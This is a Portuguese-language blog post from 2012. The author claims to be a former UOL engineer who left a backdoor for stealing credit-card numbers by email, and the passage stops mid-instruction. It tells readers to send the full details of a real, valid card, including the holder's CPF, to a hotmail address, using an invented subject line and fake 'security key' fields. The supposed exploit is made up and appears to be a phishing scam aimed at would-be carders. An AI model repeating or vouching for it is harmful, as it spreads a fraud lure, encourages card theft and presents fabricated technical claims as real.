domingo, 24 de junho de 2012


hackeando contas


Como HACKEAR números de Cartão de Créditos?
Deixe eu me apresentar, fui engenheiro do grupo UOL em 2006 sei de muita coisa desta empresa, inclusive deixei brechas de segurança que nunca foram encontradas ou arrumadas... sou o responsável por duas delas, e uma que os caros amigos vão gostar muito.
Deixei implementada nos servidores do UOL uma maneira muito fácil para roubar números de cartões de créditos por e-mail! Vou explicar melhor...

Sempre quando alguêm faz uma compra na internet com cartões de créditos, as informações ficam armazenadas em um servidor de dados, alguns seguros outros nem tanto! Todos sabemos que brechas de segurança estão ai para serem exploradas. Meus amigos da UOL são campeões nesse aspecto. Seus servidores são tão inseguros que várias operações podem ser feitas sem muitos problemas como: - enviar e-mail sem estar autenticado e pasmem... roubar cartões de créditos armazenados em seus servidores.

Eu deixei uma falha em um servidor da UOL (que é o mesmo usado pelo BOL), através de um e-mail que permite ao hacker enviar pra o servidor linhas de código que acabam gerando um Bug e após confirmar umas informações lhe retorna as informações de cartão de crédito dos últimos 5 clientes ativos.

Para que você receba as informações corretamente siga as instruções(tem que ser do jeito que está aqui):

mande um email para: (hackerbrasil2012@hotmail.com.br)

com assunto: accnto0545-cc-ecard-infoE 52488-Cod.05 ( isto vai gerar o bug no servidor - não use espaços!)

Note que na primeira linha da mensagem você deverá colocar as informaçõe de um cartão válido - porque quando você mandar o email o servidor com o bug faz uma breve confirmação de dados do cartão (é a única barreira de segurança dele) - então não adianta colocar numero de cartão falso porque não funciona - tem que ser cartão verdadeiro que funcione! Siga o exemplo de como colocar no email:

(1ª linha)
000003#//0000003## (não mude isso!!!- é como uma chave de segurança do servidor)

(2ª Linha) ( Aqui você vai colocar as informações do cartão válido, que você vai usar pra entrar no servidor - Tem que ser um cartão válido!)

Name#: (Nome que está no cartão válido - do jeito que está no cartão)

Number-e-card#: (Número do cartão válido - o mesmo cartão que você colocou o nome)

e-card#Grup#: (Nome da empresa do cartão válido - Mastercard, Visa, Credicard, etc)

Vili# mm/aa (aqui voce coloca a data de válidade do cartão válido - mes /ano)

cpf###: (número do cpf do dono do cartão - para verificação do sistema)

number-segurity##: sytem0000478547#####03 ( não mude este número ? geralmente é os 3 últimos digitos e está atras do cartão de crédito.)

return in time#:0015 (tempo de retorno das informações - sugiro que seja 15 min)

return#: (coloque entre o e-mail que você deseja que retorne os núm...